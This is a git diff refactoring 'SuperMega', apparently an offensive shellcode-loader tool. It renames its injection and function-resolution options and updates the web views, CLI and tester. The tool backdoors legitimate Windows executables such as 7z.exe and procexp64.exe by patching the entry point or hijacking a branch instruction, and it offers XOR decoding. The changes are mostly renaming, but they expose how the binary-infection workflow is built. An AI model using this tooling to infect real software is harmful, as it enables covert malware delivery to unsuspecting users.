diff --git a/app/templates/project.html b/app/templates/project.html index 5458331..2419aaf 100644 --- a/app/templates/project.html +++ b/app/templates/project.html @@ -84,31 +84,23 @@
- + {% for name, value in carrier_invoke_styles %} {% endfor %}
- - - -
diff --git a/app/templates/project_add_get.html b/app/templates/project_add_get.html index b9972ec..51eca1f 100644 --- a/app/templates/project_add_get.html +++ b/app/templates/project_add_get.html @@ -35,13 +35,7 @@ - - @@ -52,14 +46,8 @@ {% endfor %} - - - + {% for name, value in carrier_invoke_styles %} {% endfor %} diff --git a/app/views_project.py b/app/views_project.py index 0474d5c..1ab1398 100644 --- a/app/views_project.py +++ b/app/views_project.py @@ -65,11 +65,9 @@ def project(name): for file in os.listdir(PATH_SHELLCODES): shellcodes.append(file) - sourcestyles = [(color.name, color.value) for color in SourceStyle] - allocstyles = [(color.name, color.value) for color in AllocStyle] + function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle] decoderstyles = [(color.name, color.value) for color in DecoderStyle] - execstyles = [(color.name, color.value) for color in ExecStyle] - injectstyles = [(color.name, color.value) for color in InjectStyle] + carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle] return render_template('project.html', project_name = name, @@ -79,11 +77,9 @@ def project(name): exes=exes, shellcodes=shellcodes, - sourcestyles=sourcestyles, - allocstyles=allocstyles, + function_invoke_styles=function_invoke_styles, decoderstyles=decoderstyles, - execstyles=execstyles, - injectstyles=injectstyles, + carrier_invoke_styles=carrier_invoke_styles, log_files=log_files, is_64=is_64, @@ -110,13 +106,10 @@ def add_project(): settings.inject_exe_out = request.form['exe'].replace(".exe", ".infected.exe") source_style = request.form['source_style'] - settings.source_style = SourceStyle[source_style] + settings.source_style = FunctionInvokeStyle[source_style] - inject_mode = request.form['inject_mode'] - settings.inject_mode = InjectStyle[inject_mode] - - alloc_style = request.form['alloc_style'] - settings.alloc_style = AllocStyle[alloc_style] + carrier_invoke_style = request.form['carrier_invoke_style'] + settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style] decoder_style = request.form['decoder_style'] settings.decoder_style = DecoderStyle[decoder_style] @@ -147,20 +140,16 @@ def add_project(): for file in os.listdir(PATH_SHELLCODES): shellcodes.append(file) - sourcestyles = [(color.name, color.value) for color in SourceStyle] - allocstyles = [(color.name, color.value) for color in AllocStyle] + function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle] decoderstyles = [(color.name, color.value) for color in DecoderStyle] - execstyles = [(color.name, color.value) for color in ExecStyle] - injectstyles = [(color.name, color.value) for color in InjectStyle] + carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle] return render_template('project_add_get.html', exes=exes, shellcodes=shellcodes, - sourcestyles=sourcestyles, - allocstyles=allocstyles, + function_invoke_styles=function_invoke_styles, decoderstyles=decoderstyles, - execstyles=execstyles, - injectstyles=injectstyles, + carrier_invoke_styles=carrier_invoke_styles, ) diff --git a/helper.py b/helper.py index 9ee8972..847dade 100644 --- a/helper.py +++ b/helper.py @@ -107,14 +107,14 @@ def file_readall_binary(filepath) -> bytes: return data -def rbrunmode_str(rbrunmode): - rbrunmode = str(rbrunmode) - if rbrunmode == "1": +def carrier_invoke_style_str(carrier_invoke_style): + carrier_invoke_style = str(carrier_invoke_style) + if carrier_invoke_style == "1": return "change address of entrypoint" - elif rbrunmode == "2": + elif carrier_invoke_style == "2": return "hijack branching instruction in entrypoint" else: - return "Invalid: {}".format(rbrunmode) + return "Invalid: {}".format(carrier_invoke_style) diff --git a/model/defs.py b/model/defs.py index 3786279..88ce722 100644 --- a/model/defs.py +++ b/model/defs.py @@ -23,33 +23,25 @@ PATH_WEB_PROJECT = "projects/" # Correlated with real template files # in data/plugins/ -class AllocStyle(Enum): - RWX = "rwx_1" - #RW_X = "rw_x" - #REUSE = "reuse" class DecoderStyle(Enum): PLAIN_1 = "plain_1" XOR_1 = "xor_1" -class ExecStyle(Enum): - CALL = "direct_1" - #JMP = "jump", - #FIBER = "fiber", class DataRefStyle(Enum): APPEND = 1 -class InjectStyle(Enum): +class CarrierInvokeStyle(Enum): ChangeEntryPoint = "change AddressOfEntryPoint" BackdoorCallInstr = "hijack branching instruction in entrypoint" - -class SourceStyle(Enum): + + +class FunctionInvokeStyle(Enum): peb_walk = "peb_walk" iat_reuse = "iat_reuse" - class PeRelocEntry(): def __init__(self, rva: int, base_rva: int, type: str): diff --git a/model/settings.py b/model/settings.py index 8b365a6..c8e2f50 100644 --- a/model/settings.py +++ b/model/settings.py @@ -9,15 +9,13 @@ class Settings(): self.payload_path: FilePath = "" # Settings - self.source_style: SourceStyle = SourceStyle.peb_walk - self.alloc_style: AllocStyle = AllocStyle.RWX - self.exec_style: ExecStyle = ExecStyle.CALL + self.source_style: FunctionInvokeStyle = FunctionInvokeStyle.peb_walk self.decoder_style: DecoderStyle = DecoderStyle.XOR_1 self.dataref_style: DataRefStyle = DataRefStyle.APPEND self.short_call_patching: bool = False # Injectable - self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr + self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr self.inject_exe_in: FilePath = "" self.inject_exe_out: FilePath = "" diff --git a/pe/derbackdoorer.py b/pe/derbackdoorer.py index 3d6de2f..9997a60 100644 --- a/pe/derbackdoorer.py +++ b/pe/derbackdoorer.py @@ -19,9 +19,9 @@ logger = logging.getLogger("DerBackdoorer") class PeBackdoor: - def __init__(self, superpe: SuperPe, main_shc: bytes, inject_mode: InjectStyle): + def __init__(self, superpe: SuperPe, main_shc: bytes, carrier_invoke_style: CarrierInvokeStyle): self.superpe: SuperPe = superpe - self.runMode: InjectStyle = inject_mode + self.carrier_invoke_style: CarrierInvokeStyle = carrier_invoke_style self.shellcodeData: bytes = main_shc # Working @@ -72,17 +72,17 @@ Trailing {sect_name} bytes: def setupShellcodeEntryPoint(self): - if self.runMode == InjectStyle.ChangeEntryPoint: + if self.carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) self.superpe.set_entrypoint(rva) logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:X}') return True - elif self.runMode == InjectStyle.BackdoorCallInstr: + elif self.carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr: return self.backdoorEntryPoint() - #elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport): + #elif self.carrier_invoke_style == int(PeBackdoor.Supportedcarrier_invoke_styles.HijackExport): # addr = self.getExportEntryPoint() # if addr == -1: # logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!') diff --git a/phases/compiler.py b/phases/compiler.py index 4465e04..4bcc18e 100644 --- a/phases/compiler.py +++ b/phases/compiler.py @@ -62,7 +62,7 @@ def compile( asm_out: FilePath, payload_len: int, carrier: Carrier, - source_style: SourceStyle, + source_style: FunctionInvokeStyle, exe_host: ExeHost, short_call_patching: bool = False, ): @@ -111,7 +111,7 @@ def compile( asm_clean_file )) - if source_style == SourceStyle.iat_reuse: + if source_style == FunctionInvokeStyle.iat_reuse: fixup_iat_reuse(asm_clean_file, carrier) observer.add_text_file("carrier_asm_updated", file_readall_text(asm_clean_file)) diff --git a/phases/injector.py b/phases/injector.py index 09cd0da..c59e22e 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -23,8 +23,8 @@ def inject_exe( shellcode_in = project.payload.payload_path exe_in = settings.inject_exe_in exe_out = settings.inject_exe_out - inject_mode: InjectStyle = settings.inject_mode - source_style: SourceStyle = settings.source_style + carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style + source_style: FunctionInvokeStyle = settings.source_style logger.info("--[ Injecting: {} + {} -> {}".format( shellcode_in, exe_in, exe_out @@ -42,7 +42,7 @@ def inject_exe( # superpe is a representation of the exe file. We gonna modify it, and save it at the end. superpe = SuperPe(exe_in) - peinj = PeBackdoor(superpe, main_shc, inject_mode) + peinj = PeBackdoor(superpe, main_shc, carrier_invoke_style) if not peinj.injectShellcode(): logger.error('Could not inject shellcode into PE file!') @@ -53,7 +53,7 @@ def inject_exe( return False logger.info("--[ Rewrite placeholders with their data") - if source_style == SourceStyle.iat_reuse: + if source_style == FunctionInvokeStyle.iat_reuse: injected_fix_iat(superpe, project.carrier, project.exe_host) if True: diff --git a/phases/templater.py b/phases/templater.py index 8a3b30d..4df0271 100644 --- a/phases/templater.py +++ b/phases/templater.py @@ -24,7 +24,7 @@ def create_c_from_template(settings: Settings, payload_len: int): }) # C Template: peb_walk - if settings.source_style == SourceStyle.peb_walk: + if settings.source_style == FunctionInvokeStyle.peb_walk: with open(settings.template_path, 'r', encoding='utf-8') as file: template_content = file.read() observer.add_text_file("main_c_template", template_content) @@ -39,7 +39,7 @@ def create_c_from_template(settings: Settings, payload_len: int): observer.add_text_file("main_c_rendered", rendered_template) # C Template: iat_reuse - elif settings.source_style == SourceStyle.iat_reuse: + elif settings.source_style == FunctionInvokeStyle.iat_reuse: with open(PATH_IAT_REUSE + "template.c", 'r', encoding='utf-8') as file: template_content = file.read() observer.add_text_file("main_c_template", template_content) diff --git a/supermega.py b/supermega.py index b766ef5..23e2240 100644 --- a/supermega.py +++ b/supermega.py @@ -29,11 +29,9 @@ def main(): parser = argparse.ArgumentParser(description='SuperMega shellcode loader') parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode') parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in') - parser.add_argument('--sourcestyle', type=str, help='peb_walk or iat_reuse') - #parser.add_argument('--alloc', type=str, help='Template: which allocator plugin') + parser.add_argument('--function_invoke_style', type=str, help='peb_walk or iat_reuse') parser.add_argument('--decoder', type=str, help='Template: which decoder plugin') - #parser.add_argument('--exec', type=str, help='Template: which exec plugin') - parser.add_argument('--rbrunmode', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)') + parser.add_argument('--carrier_invoke', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)') parser.add_argument('--start-injected', action='store_true', help='Dev: Start the generated infected executable at the end') parser.add_argument('--start-loader-shellcode', action='store_true', help='Dev: Start the loader shellcode (without payload)') parser.add_argument('--start-final-shellcode', action='store_true', help='Debug: Start the final shellcode (loader + payload)') @@ -53,31 +51,25 @@ def main(): if args.short_call_patching: settings.short_call_patching = True - if args.sourcestyle: - if args.sourcestyle == "peb_walk": - settings.source_style = SourceStyle.peb_walk - elif args.sourcestyle == "iat_reuse": - settings.source_style = SourceStyle.iat_reuse - #if args.alloc: - # if args.alloc == "rwx_1": - # settings.alloc_style = AllocStyle.RWX + if args.function_invoke_style: + if args.function_invoke_style == "peb_walk": + settings.source_style = FunctionInvokeStyle.peb_walk + elif args.function_invoke_style == "iat_reuse": + settings.source_style = FunctionInvokeStyle.iat_reuse if args.decoder: if args.decoder == "plain_1": settings.decoder_style = DecoderStyle.PLAIN_1 elif args.decoder == "xor_1": settings.decoder_style = DecoderStyle.XOR_1 - #if args.exec: - # if args.exec == "direct_1": - # settings.exec_style = ExecStyle.CALL if args.inject: - if args.rbrunmode == "eop": - settings.inject_mode = InjectStyle.ChangeEntryPoint - elif args.rbrunmode == "backdoor": - settings.inject_mode = InjectStyle.BackdoorCallInstr + if args.carrier_invoke == "eop": + settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint + elif args.carrier_invoke == "backdoor": + settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr else: logging.error("Invalid mode, use one of:") for i in ["eop", "backdoor"]: - logging.error(" {} {}".format(i, rbrunmode_str(i))) + logging.error(" {} {}".format(i, carrier_invoke_style_str(i))) return if not args.shellcode or not args.inject: @@ -141,13 +133,10 @@ def start_real(settings: Settings): project = Project(settings) project.init() - logger.warning("--I SourceStyle: {} Inject Mode: {} ".format( - project.settings.source_style.value, project.settings.inject_mode.value)) - logger.warning("--I Loader modules: Alloc: {} Decoder: {} Exec: {}".format( - project.settings.alloc_style.value, - project.settings.decoder_style.value, - project.settings.exec_style.value - )) + logger.warning("--I FunctionInvokeStyle: {} Inject Mode: {} DecoderStyle: {}".format( + project.settings.source_style.value, + project.settings.carrier_invoke_style.value, + project.settings.decoder_style.value)) # Create: Carrier C source files from template (C->C) phases.templater.create_c_from_template(settings, project.payload.len) diff --git a/tester.py b/tester.py index 4a9cf0a..94d01a0 100644 --- a/tester.py +++ b/tester.py @@ -19,8 +19,8 @@ def main(): settings.try_start_final_infected_exe = False # 7z, peb-walk, change-entrypoint - settings.source_style = SourceStyle.peb_walk - settings.inject_mode = InjectStyle.ChangeEntryPoint + settings.source_style = FunctionInvokeStyle.peb_walk + settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint settings.inject_exe_in = PATH_EXES + "7z.exe" settings.inject_exe_out = PATH_EXES + "7z.verify.exe" if start(settings) != 0: @@ -28,8 +28,8 @@ def main(): return 1 # 7z, peb-walk, hijack - settings.source_style = SourceStyle.peb_walk - settings.inject_mode = InjectStyle.BackdoorCallInstr + settings.source_style = FunctionInvokeStyle.peb_walk + settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr settings.inject_exe_in = PATH_EXES + "7z.exe" settings.inject_exe_out = PATH_EXES + "7z.verify.exe" if start(settings) != 0: @@ -37,8 +37,8 @@ def main(): return 1 # procexp, iat-reuse, change-entrypoint - settings.source_style = SourceStyle.iat_reuse - settings.inject_mode = InjectStyle.ChangeEntryPoint + settings.source_style = FunctionInvokeStyle.iat_reuse + settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint settings.inject_exe_in = PATH_EXES + "procexp64.exe" settings.inject_exe_out = PATH_EXES + "procexp64.verify.exe" if start(settings) != 0: @@ -46,8 +46,8 @@ def main(): return 1 # procexp, iat-reuse, change-entrypoint - settings.source_style = SourceStyle.iat_reuse - settings.inject_mode = InjectStyle.ChangeEntryPoint + settings.source_style = FunctionInvokeStyle.iat_reuse + settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint settings.inject_exe_in = PATH_EXES + "procexp64.exe" settings.inject_exe_out = PATH_EXES + "procexp64.verify.exe" if start(settings) != 0: